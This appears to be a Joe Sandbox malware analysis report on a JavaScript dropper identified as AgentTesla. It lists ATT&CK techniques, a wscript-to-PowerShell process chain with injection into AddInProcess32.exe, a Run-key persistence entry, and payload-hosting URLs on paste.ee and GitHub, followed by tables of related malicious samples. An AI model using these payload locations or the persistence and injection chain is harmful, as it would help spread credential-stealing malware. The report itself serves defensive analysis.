Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; 11 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 261 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 File and Directory Discovery; 34 System Information Discovery; 531 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph ID: 1528227 | Sample: scan_374783.js | Start date: 07/10/2024 | Architecture: WINDOWS | Score: 100

2: Start
    DNS/IP: 38 paste.ee; 40 ip-api.com; 42 raw.githubusercontent.com
    Signatures: 56 Found malware configuration; 58 Malicious sample detected (through community Yara rule); 60 Yara detected AgentTesla; 64 9 other signatures
    Started: 10 wscript.exe; 14 wscript.exe; 16 wscript.exe
38: paste.ee
    Signature: 62 Connects to a pastebin service (likely for C&C)
10: wscript.exe 1 1
    DNS/IP: 46 paste.ee 188.114.97.3, 443, 49699, 49700 CLOUDFLARENETUS European Union
    Signatures: 74 System process connects to network (likely due to code injection or exploit); 76 JScript performs obfuscated calls to suspicious functions; 78 Suspicious powershell command line found; 80 4 other signatures
    Started: 18 powershell.exe
18: powershell.exe 7
    Signatures: 50 Suspicious powershell command line found; 52 Obfuscated command line found; 54 Found suspicious powershell code related to unpacking or dynamic code loading
    Started: 21 powershell.exe; 25 conhost.exe
21: powershell.exe 15 16
    DNS/IP: 44 raw.githubusercontent.com 185.199.110.133, 443, 49709 FASTLYUS Netherlands
    Signatures: 66 Creates autostart registry keys with suspicious values (likely registry only malware); 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 70 Writes to foreign memory regions; 72 Injects a PE file into a foreign processes
    Started: 27 AddInProcess32.exe; 31 cmd.exe
27: AddInProcess32.exe 15 2
    DNS/IP: 48 ip-api.com 208.95.112.1, 49744, 80 TUT-ASUS United States
    Signatures: 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 86 Tries to steal Mail credentials (via file / registry access); 90 2 other signatures
31: cmd.exe 2
    Dropped file: 36 C:\ProgramData\alcatifa.vbs, ASCII
    Signature: 88 Command shell drops VBS files
    Started: 34 conhost.exe

Source | Detection | Scanner | Label | Link
scan_374783.js | 3% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
https://account.dyn.com/ | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://ip-api.com | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
paste.ee | 188.114.97.3 | true | true | | unknown
raw.githubusercontent.com | 185.199.110.133 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt | false | | unknown
https://paste.ee/d/gvOd3 | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://paste.ee:443/d/gvOd3 | wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://account.dyn.com/ | powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://paste.ee/d/gvOd3ee/dD | wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 0000000B.00000002.1413532103.0000027D0122A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com; | wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercont | powershell.exe, 0000000B.00000002.1413532103.0000027D01707000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://analytics.paste.ee | wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ip-api.comp | AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://paste.ee/ | wscript.exe, 00000000.00000003.1517826151.000001D52D429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D429000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://paste.ee/zD | wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://www.google.com | wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://paste.ee/d/gvOd3 | wscript.exe, 00000000.00000003.1518428835.000001D52F330000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517658450.000001D52D466000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521404049.000001D52EE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D44E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517797280.000001D52D44D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517220439.000001D52EE7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517618403.000001D52D455000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517765900.000001D52D46C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521135156.000001D52EE40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520438484.000001D52D46D000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://raw.githubusercontent.com | powershell.exe, 0000000B.00000002.1413532103.0000027D01685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://raw.githubusercontent.com | powershell.exe, 0000000B.00000002.1413532103.0000027D0170C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.orgX | powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://analytics.paste.ee; | wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtC7I; | powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://cdnjs.cloudflare.com | wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1489002671.000001FFE5D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1489002671.000001FFE5CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com; | wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1489002671.000001FFE5CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B96000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                  https://secure.gravatar.comwscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://oneget.orgpowershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://paste.ee/d/gvOd3twscript.exe, 00000000.00000003.1516670838.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516964493.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520758800.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
188.114.97.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
185.199.110.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528227
Start date and time: 2024-10-07 17:08:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: scan_374783.js
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJS@13/6@3/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 19
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.186.74, 142.250.186.42, 142.250.186.170, 142.250.185.138, 142.250.184.202, 172.217.18.10, 216.58.206.74, 142.250.185.74, 216.58.206.42, 142.250.186.106, 142.250.186.138, 172.217.18.106, 142.250.181.234, 142.250.185.106, 172.217.16.202, 172.217.23.106
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6688 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: scan_374783.js
Time | Type | Description
11:09:13 | API Interceptor | 42x Sleep call for process: powershell.exe modified
12:11:30 | API Interceptor | 2x Sleep call for process: wscript.exe modified
17:09:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alcatifa.vbs
18:11:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alcatifa.vbs
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | RFQ 002593810024350.bat.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Request For Quotation.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | PixpFUv4G7.exe | malicious | Quasar, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | ip-api.com/json/?fields=225545
208.95.112.1 | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Bpz46JayQ4.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | qtYuyATh0U.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | SOA-injazfe-10424.vbs | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
188.114.97.3 | IRYzGMMbSw.exe | malicious | FormBook | www.bayarcepat19.click/yuvr/
188.114.97.3 | Arrival Notice.exe | malicious | FormBook | www.cc101.pro/0r21/
188.114.97.3 | http://www.thegulfthermale.com.tr/antai/12/3dsec.php | malicious | Unknown | www.thegulfthermale.com.tr/antai/12/3dsec.php
188.114.97.3 | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/eZFzMENr/download
188.114.97.3 | QUOTATION_OCTQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/MlZtCPkK/download
188.114.97.3 | https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2 | malicious | HTMLPhisher | mairie-espondeilhan.com/
188.114.97.3 | QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | filetransfer.io/data-package/758bYd86/download
188.114.97.3 | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/58PSl7si/download
188.114.97.3 | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/58PSl7si/download
188.114.97.3 | payment copy.exe | malicious | FormBook | www.cc101.pro/0r21/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | invoice_45009.xls | malicious | Remcos | 185.199.111.133
raw.githubusercontent.com | Payment.vbs | malicious | FormBook | 185.199.111.133
raw.githubusercontent.com | PAYMENT SPECIFIKACIJA 364846637-pdf.vbs | malicious | Remcos | 185.199.108.133
raw.githubusercontent.com | OTO2wVGgkl.exe | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | k4STQvJ6rV.vbs | malicious | XWorm | 185.199.108.133
raw.githubusercontent.com | Request For Quotation.js | malicious | AgentTesla | 185.199.108.133
raw.githubusercontent.com | PO.78NO9.xls | malicious | FormBook | 185.199.108.133
raw.githubusercontent.com | Company Profile.vbs | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | ls6sm8RNqn.rtf | malicious | Remcos | 185.199.109.133
raw.githubusercontent.com | na.rtf | malicious | Remcos | 185.199.109.133
ip-api.com | RFQ 002593810024350.bat.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | http://tcaconnect.ac-page.com/toronto-construction-association-inc/ | malicious | Unknown | 51.77.64.70
ip-api.com | Request For Quotation.js | malicious | AgentTesla | 208.95.112.1
ip-api.com | PixpFUv4G7.exe | malicious | Quasar, XWorm | 208.95.112.1
ip-api.com | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | 208.95.112.1
ip-api.com | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
ip-api.com | Bpz46JayQ4.exe | malicious | XWorm | 208.95.112.1
ip-api.com | qtYuyATh0U.exe | malicious | XWorm | 208.95.112.1
ip-api.com | SOA-injazfe-10424.vbs | malicious | XWorm | 208.95.112.1
paste.ee | Payment.vbs | malicious | FormBook | 188.114.96.3
paste.ee | PAYMENT SPECIFIKACIJA 364846637-pdf.vbs | malicious | Remcos | 188.114.97.3
paste.ee | k4STQvJ6rV.vbs | malicious | XWorm | 188.114.97.3
paste.ee | Quotation request YN2024-10-07pdf.vbs | malicious | Remcos | 188.114.96.3
paste.ee | Urgent Purchase Order (P.O.) No.477764107102024.vbs | malicious | Remcos | 188.114.96.3
paste.ee | SWIFT 103 202406111301435660 110624-pdf.vbs | malicious | Remcos | 188.114.97.3
paste.ee | FAKTURA-pdf-466366332.vbs | malicious | Unknown | 188.114.96.3
paste.ee | PDFDQ_P01_303B9367_2024-10-03_185650.vbs | malicious | Remcos | 188.114.96.3
paste.ee | SKMBT_77122012816310TD0128_17311_XLS.vbs | malicious | Remcos | 188.114.97.3
paste.ee | Purchase Order - PO14895.vbs | malicious | Remcos | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04 | malicious | Unknown | 104.17.223.152
CLOUDFLARENETUS | https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.htr.gtdzwq?v=frudxdxrtxfilfrjx.htrd.iwtlt___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpjOGJiNWZiM2U4NjZhMDk1M2Y0MGVjY2U1MDhmYjQ4YTo3OmM4Y2I6MDdlZDdhNDI4N2UyMzc1NGJjZGQ1YjkyOWYyODg2OTI5ZDkyNzU0YTQ2NWI4MzhkYWZlMmM3NjA5ZGMyZGNmMzpoOlQ6VA#YnJhbmRvbi53YW5nQGludGVncmFjb25uZWN0LmNvbQ== | malicious | HTMLPhisher | 188.114.96.3
CLOUDFLARENETUS | 8ID0109FLT24PO92CD-R.pdf | malicious | HTMLPhisher | 172.67.74.152
CLOUDFLARENETUS | https://www.rhris.com/EmailEmploymentValidation.cfm?EmploymentRefID=E84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF | malicious | Unknown | 104.21.44.9
CLOUDFLARENETUS | shipping.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | https://protect2.fireeye.com/v1/url?k=31323334-50bba2bf-3132a9b3-4544474f5631-9e1721db7158d01a&q=1&e=fd99754d-b74a-4ce2-bf27-63a41e808f94&u=https%3A%2F%2Fwww.rhris.com%2FEmailEmploymentValidation.cfm%3FEmploymentRefID%3DE84F959AEA960B8186C356E23E6C822C8E204B6A75564EECEC1823507D68DDBF | malicious | Unknown | 104.21.44.9
CLOUDFLARENETUS | VML S.A..pdf | malicious | HtmlDropper | 104.18.95.41
CLOUDFLARENETUS | https://future.nhs.uk | malicious | Unknown | 104.18.70.113
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.53.8
CLOUDFLARENETUS | IRYzGMMbSw.exe | malicious | FormBook | 172.67.181.150
FASTLYUS | https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04 | malicious | Unknown | 151.101.194.109
FASTLYUS | na.elf | malicious | Unknown | 151.101.174.214
FASTLYUS | https://issuu.com/smart_media/docs/die_welt_wirtschaft/19 | malicious | Unknown | 151.101.129.140
FASTLYUS | Hscni Remittance_8115919700_16831215.html | malicious | Tycoon2FA | 151.101.130.137
FASTLYUS | invoice_45009.xls | malicious | Remcos | 185.199.111.133
FASTLYUS | Payment.vbs | malicious | FormBook | 185.199.111.133
FASTLYUS | PAYMENT SPECIFIKACIJA 364846637-pdf.vbs | malicious | Remcos | 185.199.108.133
FASTLYUS | original.eml | malicious | Tycoon2FA | 151.101.194.137
FASTLYUS | https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1 | malicious | Unknown | 151.101.66.137
FASTLYUS | http://twbcompany.com | malicious | Unknown | 151.101.2.137
TUT-ASUS | RFQ 002593810024350.bat.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | DHL_Doc.9787653446578978656879764534576879764545766456.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Request For Quotation.js | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | PixpFUv4G7.exe | malicious | Quasar, XWorm | 208.95.112.1
TUT-ASUS | H2f8SkAvdV.exe | malicious | Blank Grabber, XWorm | 208.95.112.1
TUT-ASUS | A39tzaySzX.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
TUT-ASUS | Bpz46JayQ4.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | qtYuyATh0U.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | SOA-injazfe-10424.vbs | malicious | XWorm | 208.95.112.1
TUT-ASUS | 8QBpLkbY6i.exe | malicious | WhiteSnake Stealer | 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context

Match: 185.199.110.133
3b5074b1b5d032e5620f69f9f700ff0efile.exe | Get hash | malicious | Credential Flusher | Browse | 185.199.110.133
shipping.exe | Get hash | malicious | AgentTesla | Browse | 185.199.110.133
https://future.nhs.uk | Get hash | malicious | Unknown | Browse | 185.199.110.133
wrong bank details.exe | Get hash | malicious | MassLogger RAT | Browse | 185.199.110.133
z1PO7311145.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 185.199.110.133
TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 185.199.110.133
Payment.vbs | Get hash | malicious | FormBook | Browse | 185.199.110.133
PAYMENT SPECIFIKACIJA 364846637-pdf.vbs | Get hash | malicious | Remcos | Browse | 185.199.110.133
https://bono-sicherheitstechniksharefile.btn-ebikes.com/ | Get hash | malicious | HtmlDropper | Browse | 185.199.110.133
Portal.msi | Get hash | malicious | Unknown | Browse | 185.199.110.133

Match: 188.114.97.3
a0e9f5d64349fb13191bc781f81f42e1file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
uhwovHh7pS.msi | Get hash | malicious | VMdetect | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
BzLGqYKy7o.exe | Get hash | malicious | SmokeLoader | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
xwZfYpo16i.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc | Browse | 188.114.97.3
c3KH2gLNrM.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | Browse | 188.114.97.3
file.exe | Get hash | malicious | LummaC | Browse | 188.114.97.3
                                                                        No context
Process: C:\Windows\System32\cmd.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 437480
Entropy (8bit): 5.105403560005336
Encrypted: false
SSDEEP: 6144:sVNFUxUwlTY4h4QmIICQ791+yhii4591lF1UflGsZcfb:nINyeOirlc
MD5: 42320E659E8E1885EB96342E52E4EC60
SHA1: 8FF7099935C8375DDC21E19D61FE13AE56BEA2F0
SHA-256: 5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9
SHA-512: CC35BB7E273C59C39C25FB902E12379A368FAE97C8403C7DF669DB215E57BDB805D649FAA7DB084E13ADE1F4AA3D97F3457E667770EF2F5D489AD9AED214A707
Malicious: true
Reputation: moderate, very likely benign file
